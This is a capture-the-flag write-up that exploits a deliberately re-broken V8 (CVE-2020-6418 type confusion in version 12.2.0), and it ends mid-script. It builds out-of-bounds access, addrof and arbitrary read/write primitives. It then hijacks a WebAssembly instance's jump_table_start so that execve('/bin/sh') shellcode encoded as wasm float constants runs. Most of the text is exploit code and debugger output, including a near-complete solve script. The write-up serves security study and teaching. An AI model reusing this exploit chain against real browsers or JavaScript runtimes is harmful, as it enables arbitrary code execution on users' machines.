ezv8 revenge

Author: spektre
Description: Looks like we have some reliability issues here; what could possibly go wrong?
Attachment: ezv8revenge.tar.gz


Some lines of code may be hidden for brevity.

Unhide the lines by clicking the eye button on top right corner of the code block


  • CVE-2020-6418 type confusion on V8 version 12.2.0 (27 Dec 2023)
  • Type confusion to memory corruption to OOB access
  • Hijack wasm instance's jump table starting address to jump into shellcode embedded inside JIT'd wasm code

Patch Analysis

The given patch is the reverse of the fix for CVE-2020-6418. I stumbled upon this awesome N-day analysis written by Daniel when searching for kUnreliableMaps. Detail on the root cause would not be discussed here.

diff --git a/src/compiler/node-properties.cc b/src/compiler/node-properties.cc
index 08149558722..6dabffbe8d1 100644
--- a/src/compiler/node-properties.cc
+++ b/src/compiler/node-properties.cc
@@ -448,7 +448,7 @@ NodeProperties::InferMapsResult NodeProperties::InferMapsUnsafe(
           // We reached the allocation of the {receiver}.
           return kNoMaps;
-        result = kUnreliableMaps;  // JSCreate can have side-effect.
+        // result = kUnreliableMaps;  // JSCreate can have side-effect.
       case IrOpcode::kJSCreatePromise: {

As discussed in the linked blog post, the vulnerability happens when the array type has been changed through Proxy, but the JIT'd function which perform push() / pop() operation still treats the array has the original type.

If an array is initialized with all elements of type double, each element would be stored as immediate value which takes up to 64-bit of memory space. On the other hand, for an array with mixed element types, each element would be stored as a pointer which takes up to 32-bit of memory space. Thus, if an array is changed from all double to mixed elements, there would be reallocation, potentially from larger size to smaller size.


If you want to dive a bit deeper into V8 internals, you could read this little note that I have written.

Type Confusion to Memory Corruption

Let's have a look at the type confusion and how it leads to overwriting another object field. This is the script used for triggering the type confusion:

THRESHOLD = 0x2000

function f(p) {
    a.push(  // [5]
        Reflect.construct(function(){}, arguments, p)?4.1835592388585281e-216:0  // [1]
    ); // itof(0x1337133700010000) = 4.1835592388585281e-216

let a;
let oob_arr;

let jitted = false

let p = new Proxy(Object, {
    get: function() {
        if (jitted) {
            a[0] = {};  // [2] change `a` from `HOLEY_DOUBLE_ELEMENTS` to `HOLEY_ELEMENTS`
            oob_arr = Array(1);  // [3]
            oob_arr[0] = 1.1;  // [4]
        return Object.prototype;

for (let i = 0; i <= THRESHOLD; i++) {
    a = Array(8)
    a[1] = 0.1
    a.pop()  // make a room such that push() does not reallocate elements
    if (i == THRESHOLD) {
        jitted = true;
  • [1]: Start of type confusion when jitted = true and goes into [2] if block statement
  • [2]: reallocates a to elements that take up less space
  • [3]: oob_arr object is allocated below a.elements, i.e., pointer to map and elements, and length
  • [4]: oob_arr.elements is allocated below oob_arr object
  • [5]: 4.1835592388585281e-216 is pushed where a is still treated as HOLEY_DOUBLE_ELEMENTS in the JIT'd code

Now, let's see it in action through debugger. Note that although after a.pop() causes a.length == 7 and this changes are reflected on the a JSArray object, the length on the elements is still 0x8 such that when a.push(x) is called it does not need to reallocate elements.


Use eval("%SystemBreak()") to properly break into debugger when analysing the changes


Initializing oob_arr directly like so oob_arr = [1.1] would make a difference due to how the elements are initially allocated before the array object

Before [2]


Since debug version of d8 is extremely slow, it is advisable to use the release version (provided that one is comfortable in pin pointing the object structure in memory)

a.elements takes up 72 bytes

$ gdb -ex 'run' --args './d8 --allow-natives-syntax --shell ./pwn.js'
0x2833000ddf69 <JSArray[7]>
gef> tele 0x2833000ddf69-0x1  # &a
0x2833000ddf68|+0x0000|+000: 0x000006cd0018eff1  # map = 0x18eff1, properties = 0x6cd
0x2833000ddf70|+0x0008|+001: 0x0000000e000ddfa1  # elements = 0xdc599, length = 0xe >> 1 = 0x7
gef> tele 0x2833000ddfa1-0x1  # &a.elements
0x2833000ddfa0|+0x0000|+000: 0x0000001000000851  # map = 0x851, length = 0x10 >> 1 = 0x8
0x2833000ddfa8|+0x0008|+001: 0xfff7fffffff7ffff  # a[0] the_hole_value
0x2833000ddfb0|+0x0010|+002: 0x3fb999999999999a  # a[1] 0.1
0x2833000ddfb8|+0x0018|+003: 0xfff7fffffff7ffff  # a[2] the_hole_value
0x2833000ddfc0|+0x0020|+004: 0xfff7fffffff7ffff  # a[3] the_hole_value
0x2833000ddfc8|+0x0028|+005: 0xfff7fffffff7ffff  # a[4] the_hole_value
0x2833000ddfd0|+0x0030|+006: 0xfff7fffffff7ffff  # a[5] the_hole_value
0x2833000ddfd8|+0x0038|+007: 0xfff7fffffff7ffff  # a[6] the_hole_value
0x2833000ddfe0|+0x0040|+008: 0xfff7fffffff7ffff  # a[7] the_hole_value (popped)
0x2833000ddfe8|+0x0048|+009: 0x00000006001923c5

After [2]

  • a.elements takes up 40 bytes (0x2833000dedc4 - 0x2833000dedeb)
  • followed by HeapNumber object for 1.1, takes up 12 bytes (0x2833000dedec - 0x2833000dedf7)
gef> c
0x2833000ddf69 <JSArray[7]>
gef> tele 0x2833000ddf69-0x1  # &a
0x2833000ddf68|+0x0000|+000: 0x000006cd0018f071
0x2833000ddf70|+0x0008|+001: 0x0000000e000dedc5  # elements changed to 0xdedc5
gef> tele 0x2833000dedc5-0x1  # &a.elements
0x2833000dedc4|+0x0000|+000: 0x0000001000000565  # map = 0x565
0x2833000dedcc|+0x0008|+001: 0x000deded000deda9  # 0xdeda9 is pointer to `{}`, 0xdeded is pointer to `HeapNumber 1.1`
0x2833000dedd4|+0x0010|+002: 0x000006e9000006e9  # 0x6e9 s pointer to `the_hole_value`
0x2833000deddc|+0x0018|+003: 0x000006e9000006e9
0x2833000dede4|+0x0020|+004: 0x000006e9000006e9
0x2833000dedec|+0x0028|+005: 0x9999999a000007b1  # @ 0xdedec is `HeapNumber 1.1`, map = 0x7b1, 0x3fb999999999999a = 1.1
0x2833000dedf4|+0x0030|+006: 0x001843c93fb99999
0x2833000dedfc|+0x0038|+007: 0x000006cd000006cd
0x2833000dee04|+0x0040|+008: 0x0022da110104c001
0x2833000dee0c|+0x0048|+009: 0x0022da81000de0c9
0x2833000dee14|+0x0050|+010: 0x00000605000006e9

After [4] & Before [5]

If we continue here, we notice that oob_arr object is not allocated immediately after the end of a.elements. This may be caused by us breaking two times previously. Thus, we need to remove the previous two %SystemBreak() and re-run it.

let p = new Proxy(Object, {
    get: function() {
        if (jitted) {
            a[0] = {};
            oob_arr = Array(1);
            oob_arr[0] = 1.1;
        return Object.prototype;

From the output below, we could see that our oob_arr object is just after a.elements which is ideal for our exploitation later on.

$ gdb -ex 'run' --args './d8 --allow-natives-syntax --shell ./pwn.js'
0x154a000dbb81 <JSArray[7]>
0x154a000dbd79 <JSArray[1]>
gef> tele 0x154a000dbb81-0x1  # &a
0x154a000dbb80|+0x0000|+000: 0x000006cd0018f071
0x154a000dbb88|+0x0008|+001: 0x0000000e000dbd45  # a.elements = 0xdbd45
gef> tele 0x154a000dbd45-0x1  # &a.elements
0x154a000dbd44|+0x0000|+000: 0x0000001000000565  # a.elements.map = 0x565, a.elements.length = 0x10 >> 1 = 0x8
0x154a000dbd4c|+0x0008|+001: 0x000dbd6d000dbd29  # a[0] = 0xdbd29 (pointer to {}), a[1] = 0xdbd6d (pointer to HeapNumber 1.1)
0x154a000dbd54|+0x0010|+002: 0x000006e9000006e9  # a[2] = the_hole_value, ...
0x154a000dbd5c|+0x0018|+003: 0x000006e9000006e9
0x154a000dbd64|+0x0020|+004: 0x000006e9000006e9
0x154a000dbd6c|+0x0028|+005: 0x9999999a000007b1  # HeapNumber 1.1
0x154a000dbd74|+0x0030|+006: 0x0018eff13fb99999  # oob_arr.map = 0x18eff1 (@ 0x154a000dbd78)
0x154a000dbd7c|+0x0038|+007: 0x000dbd95000006cd  # oob_arr.properties = 0x6cd, oob_arr.elements = 0xdbd95
0x154a000dbd84|+0x0040|+008: 0x0000056500000002  # oob_arr.elements.length = 0x2 >> 1 = 0x1
0x154a000dbd8c|+0x0048|+009: 0x000006e900000002
0x154a000dbd94|+0x0050|+010: 0x0000000200000851  # oob_arr.elements.map = 0x851, oob_arr.elements.length = 0x2 >> 1 = 0x1
0x154a000dbd9c|+0x0058|+011: 0x3ff199999999999a  # hexadecimal representation for `1.1`
0x154a000dbda4|+0x0060|+012: 0x0000000200000851
0x154a000dbdac|+0x0068|+013: 0x4000cccccccccccd
0x154a000dbdb4|+0x0070|+014: 0x000006cd0018efb1
0x154a000dbdbc|+0x0078|+015: 0x00000002000dbdcd

After [5]

Now when 4.1835592388585281e-216 is pushed, it would be located at 0x154a000dbd84

gef> tele 0x154a000dbd45-0x1 # &a
0x154a000dbd44|+0x0000|+000: 0x0000001000000565  # This is how JIT'd function `f` sees `a` elements as `HOLEY_DOUBLE_ELEMENTS` kind
0x154a000dbd4c|+0x0008|+001: 0x000dbd6d000dbd29  # a[0]
0x154a000dbd54|+0x0010|+002: 0x000006e9000006e9  # a[1]
0x154a000dbd5c|+0x0018|+003: 0x000006e9000006e9  # a[2]
0x154a000dbd64|+0x0020|+004: 0x000006e9000006e9  # a[3]
0x154a000dbd6c|+0x0028|+005: 0x9999999a000007b1  # a[4]
0x154a000dbd74|+0x0030|+006: 0x0018eff13fb99999  # a[5] 
0x154a000dbd7c|+0x0038|+007: 0x000dbd95000006cd  # a[6]
0x154a000dbd84|+0x0040|+008: 0x1337133700010000  # a[7] (recently pushed)
gef> tele 0x154a000dbd79-0x1  # &oob_arr (from `oob_arr` object perspective)
0x154a000dbd78|+0x0000|+000: 0x000006cd0018eff1  # map = 0x18eff1, properties = 0x6cd
0x154a000dbd80|+0x0008|+001: 0x00010000000dbd95  # elements = 0xdbd95, length = 0x10000 >> 1 = 0x8000
0x154a000dbd88|+0x0010|+002: 0x0000000213371337
gef> c
d8> oob_arr.length.toString(16)

addrof Primitive

After overwriting oob_arr object length, we have out-of-bound (OOB) access as the actual oob_arr.elements length is smaller than the array object length. Let's use this OOB access to build addrof primitive.

If we have an array which stores an object, the array elements would store the address of the object and accessing this through the declared array would return us the object itself but not the address due to the element kind is set accordingly. Things get interesting when we try to access this object from another array whose element kind is of PACKED_DOUBLE_ELEMENTS or HOLEY_DOUBLE_ELEMENTS. Since every elements in this array is interpreted as pure immediate value, the array would not try to derefence any value. Thus, returning us the pointer to the object.


SMI array works too but it only accesses 32-bit value at a time, unlike double array which accesses 64-bit value at a time.

Now, we introduce obj_leaker which would serve as an array that stores an object and helper functions to perform the OOB access and conversion between integer and floating number.

let a;
let oob_arr;
let obj_leaker;

let jitted = false

let p = new Proxy(Object, {
    get: function() {
        if (jitted) {
            a[0] = {};
            oob_arr = Array(1);
            oob_arr[0] = 1.1;
            obj_leaker = [a, 2.2];
        return Object.prototype;
let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);

function itof(i) {
    int_view[0] = i
    return float_view[0]

function ftoi(f) {
    float_view[0] = f
    return int_view[0]

function lo(x) {
    return x & BigInt(0xffffffff)

function hi(x) {
    return (x >> 32n) & BigInt(0xffffffff)

function hex(i) {
    return "0x" + i.toString(16)

function oob_read32(offset) {
    // convert from uint32 indexing to uin64 indexing
    let val = ftoi(oob_arr[offset >> 1])
    if (offset % 2 == 0) {
        return lo(val)
    return hi(val)

function oob_write32(offset, val) {
    // convert from uint32 indexing to uin64 indexing
    let temp = ftoi(oob_arr[offset >> 1])
    let new_val;
    if (offset % 2 == 0) {
        new_val = itof((hi(temp) << 32n) | val)
    } else {
        new_val = itof(val << 32n | lo(temp))
    oob_arr[offset >> 1] = new_val

function addrof(o) {
    obj_leaker[0] = o  // assign our target object to `obj_leaker`
    let addr = caged_oob_read32(OBJ_LEAKER_OFFSET)  // read it using `oob_arr`
    return addr

Next, we need to find OBJ_LEAKER_OFFSET which is the offset between oob_arr[0] and obj_leaker[0]. This could be achieved easily by bruteforcing and match the read value with the address of a (obtained from %DebugPrint(a))

for (let i = 0; i < 0x40; i++) {
    print(hex(i), hex(oob_read32(i)))

Using release version of d8:

$ ./d8 --allow-natives-syntax ./pwn.js
0xb 0x565
0xc 0x2
0xd 0x537c0d
0xe 0x65e589
0xf 0x6cd
0x2b0600537c0d <JSArray[8]>

From the output of %DebugPrint(a), we know that the address of a is 0x109400532779. Hence, we need to look for 0x532779 from the output and that would be our offset value, which happens to be 0xd.

function addrof(o) {
    obj_leaker[0] = o  // assign our target object to `obj_leaker`
    let addr = oob_read32(OBJ_LEAKER_OFFSET)  // read it using `oob_arr`
    return addr

$ ./d8 --allow-natives-syntax ./pwn.js
[+] Corrupted oob_arr.length with 32768
0x3c630053b595 <JSArray[8]>

We could see that our addrof primitive is working but it only retrieves the 32-bit sandbox offset which is as expected. But this is good enough for now.

Caged Arbitrary Read and Write Primitives

Now, we will see how to get arbitrary read and write primitives inside the heap sandbox by introducing another helper array. With OOB write, we could overwrite this helper array elements pointer to control the memory address in which the array perform read and write operation.

Recall that the elements object itself has 8 bytes in the beginning to store the map and length field. If the elements pointer is set to N, performing arr[i] would result in accessing memory address (N+8) + i * element_size. Thus, if we want to perform AAR/AAW on addres X, we need to subtract it by 8 and remember to set the LSB to 1 for pointer tagging.

let a;
let oob_arr;
let obj_leaker;
let c_aar_arr;
let c_aaw_arr;

let jitted = false

let p = new Proxy(Object, {
    get: function() {
        if (jitted) {
            a[0] = {};
            oob_arr = Array(1);
            oob_arr[0] = 1.1;
            obj_leaker = [a];
            c_aar_arr = [2.2];
            c_aaw_arr = [3.3];
        return Object.prototype;
const c_aar_arr_elements_offset = ??
const c_aaw_arr_elements_offset = ??

function caged_arb_read32(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
    let leak = lo(ftoi(c_aar_arr[0]))
    return leak

function caged_arb_read64(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
    let leak = ftoi(c_aar_arr[0])
    return leak

function caged_arb_write32(addr, val) {
    let elements = addr - 8n | 1n;
    let temp = caged_arb_read32(addr+4n)
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof((temp << 32n) | val)

function caged_arb_write64(addr, val) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof(val)

This time, we would need to get the offset between:

  • oob_arr[0] and &c_aar_arr.elements
  • oob_arr[0] and &c_aaw_arr.elements

We could repeat the same process when finding OBJ_LEAKER_OFFSET, but this time we would use GDB to see the value of c_aar_arr.elements

for (let i = 0; i < 0x40; i++) {
    print(hex(i), hex(oob_read32(i)))
$ gdb -ex 'run' --args './d8 --allow-natives-syntax --shell ./pwn.js'
0x13 0x6cd
0x14 0x5594bd
0x15 0x2
0x21 0x6cd
0x22 0x5594f5
0x23 0x2
gef> tele 0x327e005594a5-0x1 2
0x327e005594a4|+0x0000|+000: 0x000006cd0018efb1
0x327e005594ac|+0x0008|+001: 0x00000002005594bd
gef> tele 0x327e005594dd-0x1 2
0x327e005594dc|+0x0000|+000: 0x000006cd0018efb1
0x327e005594e4|+0x0008|+001: 0x00000002005594f5

The final working primitive:

const c_aar_arr_elements_offset = 0x14
const c_aaw_arr_elements_offset = 0x22

function caged_arb_read32(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
    let leak = lo(ftoi(c_aar_arr[0]))
    return leak

function caged_arb_read64(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
    let leak = ftoi(c_aar_arr[0])
    return leak

function caged_arb_write32(addr, val) {
    let elements = addr - 8n | 1n;
    let temp = caged_arb_read32(addr+4n)
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof((temp << 32n) | val)

function caged_arb_write64(addr, val) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof(val)

We verify that our primitive is working with this little test:

test = [6.6, 7.7]

// trying to read test[0] by getting &test.elements
test_addr = addrof(test)
test_el_addr = caged_arb_read32(test_addr+8n)
test_0 = caged_arb_read64(test_el_addr+8n)
print(itof(test_0), "===", test[0])

// trying to modify test[0] and test[1] with our write primitive
caged_arb_write32(test_el_addr+8n, 0x13371337n)
caged_arb_write32(test_el_addr+8n+4n, 0x80088008n)
caged_arb_write64(test_el_addr+8n+8n, 0xdeadbeefcafebaben)
$ ./d8 --allow-natives-syntax ./my-poc.js
[+] Corrupted oob_arr.length with 32768
6.6 === 6.6

Escaping V8 Sandbox

When one is able to perform AAR/AAW outside the heap sandbox, it is usually considered to have escaped the sandbox. One of the common method is through corrupting ArrayBuffer backing_store which stores raw pointer instead of compressed pointer. However, this is not possible anymore in the V8 version that we are using.

The novel techniques usually involve using wasm to bypass the sandbox, however some of them have been patched:

I could not find any other way to get unconstrained AAR/AAW due to lack of raw uncompressed pointer (skill issue probably).

Getting Code Execution

Getting code execution using shellcode as immediate numbers (as mentioned in the starlabs blog) does not work anymore.

After the end of the CTF, the author of this challenge revealed that he overwrote WasmInstanceObject jump_table_start to hijack the execution flow into our shellcode that we crafted inside the wasm code. Apparently, jump_table_start stores the address to RWX page for wasm stuff.

spektre: to escape the sandbox, you will need to use the wasm instance, there is a 64 bit raw pointer that is used to store the starting address of the jump table, if you overwrite that you will get RIP control. then you have to craft your shellcode in wasm code and then just have to jump in middle of the wasm code to execute your shellcode.

I used this blog post for inspiration on crafting shellcode inside wasm code using floating numbers, as well as starlabs blog post to connect the fragmented shellcode with short jmp and convert shellcode to floating numbers.

Let us try to use this simple wasm code

  (func (export "main") (result f64)
    f64.const 13.37
    f64.const 133.37
    f64.const 1333.37

Then, compile it into bytecode using this toolkit.

wat2wasm ./sc.wat

Next, convert the bytecode into array with this simple python3 script.

#!/usr/bin/env python3

import sys

with open(sys.argv[1], "rb") as f:
    bc = f.read()

arr = []
for i in bc:

$ python3 ./bc.py ./sc.wasm
[0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 124, 3, 2, 1, 0, 7, 8, 1, 4, 109, 97, 105, 110, 0, 0, 10, 33, 1, 31, 0, 68, 61, 10, 215, 163, 112, 189, 42, 64, 68, 164, 112, 61, 10, 215, 171, 96, 64, 68, 20, 174, 71, 225, 122, 213, 148, 64, 26, 26, 11]

Next, we copy and paste the array to our javascript code for integrating wasm.

// wasm.js
var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 124, 3, 2, 1, 0, 7, 8, 1, 4, 109, 97, 105, 110, 0, 0, 10, 33, 1, 31, 0, 68, 61, 10, 215, 163, 112, 189, 42, 64, 68, 164, 112, 61, 10, 215, 171, 96, 64, 68, 20, 174, 71, 225, 122, 213, 148, 64, 26, 26, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, {});
var wmain = instance.exports.main;
// JIT compile the wasm bytecode such that our floating immediate values are placed on RWX memory page
for (let j = 0x0; j < 10000; j++) {

Next, we run the javascript code in debugger using the debug version of d8. We then try to look for our 13.37 floating numbers on a RWX memory page.

$ gdb -ex 'run' --args './d8 --allow-natives-syntax --shell ./wasm.js'
gef> p/x 13.37
$1 = 0x402abd70a3d70a3d
gef> pipe search-pattern 0x402abd70a3d70a3d | grep -A1 'rwx'
[+] In (0x35ecd279d000-0x35ecd279e000 [rwx])
  0x35ecd279d84f:    3d 0a d7 a3 70 bd 2a 40  c4 c1 f9 6e c2 49 ba a4    |  =...p.*@...n.I..  |

Since we know from numencyberlabs blog post that the instruction would be mov reg, imm, we just bruteforce subtracting 0x35ecd279d84f with 1, 2, 3, ... until we get the matching instruction.

gef> x/10i 0x35ecd279d84f-0x2
   0x35ecd279d84d:      movabs r10,0x402abd70a3d70a3d
   0x35ecd279d857:      vmovq  xmm0,r10
   0x35ecd279d85c:      movabs r10,0x4060abd70a3d70a4
   0x35ecd279d866:      vmovq  xmm1,r10
   0x35ecd279d86b:      movabs r10,0x4094d57ae147ae14
   0x35ecd279d875:      vmovq  xmm2,r10
   0x35ecd279d87a:      mov    r10,QWORD PTR [rsi+0x77]

Next, we take this assembly code and dump it into this link to see the machine code.

0:  49 ba 3d 0a d7 a3 70    movabs r10,0x402abd70a3d70a3d
7:  bd 2a 40
a:  c4 c1 f9 6e c2          vmovq  xmm0,r10
f:  49 ba a4 70 3d 0a d7    movabs r10,0x4060abd70a3d70a4
16: ab 60 40
19: c4 c1 f9 6e ca          vmovq  xmm1,r10
1e: 49 ba 14 ae 47 e1 7a    movabs r10,0x4094d57ae147ae14
25: d5 94 40
28: c4 c1 f9 6e d2          vmovq  xmm2,r10

From here, we could reason out how many bytes do we need to jump from one shellcode to another shellcode. The answer is 7 bytes. Now that we have the jump offset, we could tweak the shellcode conversion script from starlabs and use it to generate our floating number shellcode. The modified script can be found here.

The next step is to analyse when is this WasmInstanceObject.jump_table_start field accessed using debugger with debug version of d8.

// wasm.js
var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 5, 1, 96, 0, 1, 124, 3, 2, 1, 0, 7, 8, 1, 4, 109, 97, 105, 110, 0, 0, 10, 33, 1, 31, 0, 68, 61, 10, 215, 163, 112, 189, 42, 64, 68, 164, 112, 61, 10, 215, 171, 96, 64, 68, 20, 174, 71, 225, 122, 213, 148, 64, 26, 26, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, {});

We could see the debug output of an WasmInstanceObject and the jump_table_start field is located at offset 0x48.

$ gdb -ex 'run' --args './d8 --allow-natives-syntax --shell ./wasm.js'
DebugPrint: 0x3b01000da03d: [WasmInstanceObject] in OldSpace
 - map: 0x3b01000d13a1 <Map[208](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x3b01000d144d <Object map = 0x3b01000da015>
 - elements: 0x3b01000006cd <FixedArray[0]> [HOLEY_ELEMENTS]
 - module_object: 0x3b01001c9a99 <Module map = 0x3b01000d1279>
 - exports_object: 0x3b01001c9ba9 <Object map = 0x3b01000da26d>
 - native_context: 0x3b01000c3c79 <NativeContext[285]>
 - memory_objects: 0x3b01000006cd <FixedArray[0]>
 - tables: 0x3b01000006cd <FixedArray[0]>
 - indirect_function_tables: 0x3b01000006cd <FixedArray[0]>
 - imported_function_refs: 0x3b01000006cd <FixedArray[0]>
 - indirect_function_table_refs: 0x3b01000006cd <FixedArray[0]>
 - wasm_internal_functions: 0x3b01001c9b79 <FixedArray[1]>
 - managed_object_maps: 0x3b01001c9b9d <FixedArray[1]>
 - feedback_vectors: 0x3b01000006cd <FixedArray[0]>
 - well_known_imports: 0x3b01000006cd <FixedArray[0]>
 - memory0_start: 0x3c00ffffffff
 - memory0_size: 0
 - new_allocation_limit_address: 0x5555557030d0
 - new_allocation_top_address: 0x5555557030c8
 - old_allocation_limit_address: 0x5555557030e8
 - old_allocation_top_address: 0x5555557030e0
 - imported_function_targets: 0x3b0100000e69 <ByteArray[0]>
 - globals_start: 0x3c00ffffffff
 - imported_mutable_globals: 0x3b0100000e69 <ByteArray[0]>
 - indirect_function_table_size: 0
 - indirect_function_table_sig_ids: 0x3b0100000e69 <ByteArray[0]>
 - indirect_function_table_targets: 0x3b0100006175 <ExternalPointerArray[0]>
 - isorecursive_canonical_types: 0x55555577d8a0
 - jump_table_start: 0x2ba49517a000
 - data_segment_starts: 0x3b0100000e69 <ByteArray[0]>
 - data_segment_sizes: 0x3b0100000e69 <ByteArray[0]>
 - element_segments: 0x3b01000006cd <FixedArray[0]>
 - hook_on_function_call_address: 0x555555702c09
 - tiering_budget_array: 0x555555774330
 - memory_bases_and_sizes: 0x3b0100000e69 <ByteArray[0]>
 - break_on_entry: 0
 - properties: 0x3b01000006cd <FixedArray[0]>
 - All own properties (excluding elements): {}

gef> tele 0x3b01000da03c 10
0x3b01000da03c|+0x0000|+000: 0x000006cd000d13a1
0x3b01000da044|+0x0008|+001: 0x000006cd000006cd
0x3b01000da04c|+0x0010|+002: 0x00000e69000006cd
0x3b01000da054|+0x0018|+003: 0x00000e6900006175 ('ua'?)
0x3b01000da05c|+0x0020|+004: 0x0000000000000e69
0x3b01000da064|+0x0028|+005: 0xffffffffff000000
0x3b01000da06c|+0x0030|+006: 0x0000000000000000
0x3b01000da074|+0x0038|+007: 0x000055555577d8a0  ->  0x00007fff00000003
0x3b01000da07c|+0x0040|+008: 0xffffffffff000000
0x3b01000da084|+0x0048|+009: 0x00002ba49517a000  ->  0x000000000007bbe9

Next, we setup a read watchpoint at 0x3b01000da084, continue, then execute:

var wmain = instance.exports.main;
gef> rwatch *0x3b01000da084
Hardware read watchpoint 1: *0x3b01000da084
gef> c
V8 version 12.2.0 (candidate)
d8> var wmain = instance.exports.main;
d8> wmain();

Thread 1 "d8" hit Hardware read watchpoint 1: *0x3b01000da084
    0x7ffff3a72e01 4c037e47           <Builtins_WasmCompileLazy+0xc1>   add    r15, QWORD PTR [rsi + 0x47]
 -> 0x7ffff3a72e05 48837df82c         <Builtins_WasmCompileLazy+0xc5>   cmp    QWORD PTR [rbp - 0x8], 0x2c
    0x7ffff3a72e0a 741d               <Builtins_WasmCompileLazy+0xca>   je     0x7ffff3a72e29 <Builtins_WasmCompileLazy+0xe9>
gef> x/gx $rsi+0x47
0x3b01000da084: 0x00002ba49517a000
gef> x/20i $rip
=> 0x7ffff3a72e05 <Builtins_WasmCompileLazy+197>:       cmp    QWORD PTR [rbp-0x8],0x2c
   0x7ffff3a72e0a <Builtins_WasmCompileLazy+202>:       je     0x7ffff3a72e29 <Builtins_WasmCompileLazy+233>
   0x7ffff3a72e0c <Builtins_WasmCompileLazy+204>:       mov    edi,0x30
   0x7ffff3a72e11 <Builtins_WasmCompileLazy+209>:       mov    r10,rsp
   0x7ffff3a72e14 <Builtins_WasmCompileLazy+212>:       sub    rsp,0x8
   0x7ffff3a72e18 <Builtins_WasmCompileLazy+216>:       and    rsp,0xfffffffffffffff0
   0x7ffff3a72e1c <Builtins_WasmCompileLazy+220>:       mov    QWORD PTR [rsp],r10
   0x7ffff3a72e20 <Builtins_WasmCompileLazy+224>:       mov    rax,QWORD PTR [r13+0x1cb8]
   0x7ffff3a72e27 <Builtins_WasmCompileLazy+231>:       call   rax
   0x7ffff3a72e29 <Builtins_WasmCompileLazy+233>:       mov    rsp,rbp
   0x7ffff3a72e2c <Builtins_WasmCompileLazy+236>:       pop    rbp
   0x7ffff3a72e2d <Builtins_WasmCompileLazy+237>:       jmp    r15
   0x7ffff3a72e30:      int3
   0x7ffff3a72e31:      int3
   0x7ffff3a72e32:      int3
   0x7ffff3a72e33:      int3
   0x7ffff3a72e34:      int3
   0x7ffff3a72e35:      int3
   0x7ffff3a72e36:      int3
   0x7ffff3a72e37:      int3

We could see that executing wmain(); triggers the watchpoint and we end up with the code that uses this jump_table_start field. Further down we could see jmp r15 instruction which reveals that if we overwrite the value of jump_table_start, we could hijack the code execution flow. This is looking good for us. However, if we try to execute wmain(); again, this part of code is not executed anymore. To trigger this again, we need to execute another function.

  (func (export "main") (result f64)
    f64.const 13.37
    f64.const 133.37
    f64.const 1333.37
  (func (export "pwn"))

We update our wasm.js with the latest bytecode and re-run it again through debugger. We then setup the read watchpoint and execute these code

var wmain = instance.exports.main;
var pwn = instance.exports.pwn;

Notice that it breaks when calling wmain() and pwn().

V8 version 12.2.0 (candidate)
d8> var wmain = instance.exports.main;
d8> wmain();

Thread 1 "d8" hit Hardware read watchpoint 1: *0x3c49000da114
gef> info reg r15
r15            0x98c16bfb000       0x98c16bfb000
gef> c

d8> var pwn = instance.exports.pwn;
d8> pwn();

Thread 1 "d8" hit Hardware read watchpoint 1: *0x3c49000da114
gef> info reg r15
r15            0x98c16bfb005       0x98c16bfb005

Also notice that now r15 is 0x5 more than jump_table_start.

Now that we have all the pieces we need, we could start creating execve('/bin/sh') shellcode and update our initial solve script. The starting location of the shellcode is consistent accross multiple run (but differs between debug and release version). Hence, we could just observe and use it when overwriting jump_table_start field.

Final Solve Script

The solve script and other helper files could be found on this link

let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);

function itof(i) {
    int_view[0] = i
    return float_view[0]

function ftoi(f) {
    float_view[0] = f
    return int_view[0]

function lo(x) {
    return x & BigInt(0xffffffff)

function hi(x) {
    return (x >> 32n) & BigInt(0xffffffff)

function hex(i) {
    return "0x" + i.toString(16)

THRESHOLD = 0x2000

function f(p) {
    a.push(Reflect.construct(function(){}, arguments, p)?4.1835592388585281e-216:0); // itof(0x1337133700010000)

let a;
let oob_arr;
let obj_leaker;
let c_aar_arr;
let c_aaw_arr;

let jitted = false

let p = new Proxy(Object, {
    get: function() {
        if (jitted) {
            a[0] = {};
            oob_arr = Array(1);
            oob_arr[0] = 1.1;
            obj_leaker = [a];
            c_aar_arr = [2.2];
            c_aaw_arr = [3.3];
        return Object.prototype;

for (let i = 0; i <= THRESHOLD; i++) {
    a = Array(8)
    a[1] = 0.1
    a.pop()  // make a room such that push() does not reallocate elements
    if (i == THRESHOLD) {
        jitted = true;
console.assert(oob_arr.length == 0x8000)
print("[+] Corrupted oob_arr.length with", oob_arr.length)

function oob_read32(offset) {
    // convert from uint32 indexing to uin64 indexing
    let val = ftoi(oob_arr[offset >> 1])
    if (offset % 2 == 0) {
        return lo(val)
    return hi(val)

function oob_write32(offset, val) {
    // convert from uint32 indexing to uin64 indexing
    let temp = ftoi(oob_arr[offset >> 1])
    let new_val;
    if (offset % 2 == 0) {
        new_val = itof((hi(temp) << 32n) | val)
    } else {
        new_val = itof(val << 32n | lo(temp))
    oob_arr[offset >> 1] = new_val

function addrof(o) {
    obj_leaker[0] = o  // assign our target object to `obj_leaker`
    let addr = oob_read32(OBJ_LEAKER_OFFSET)  // read it using `oob_arr`
    return addr

const c_aar_arr_elements_offset = 0x14
const c_aaw_arr_elements_offset = 0x22

function caged_arb_read32(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
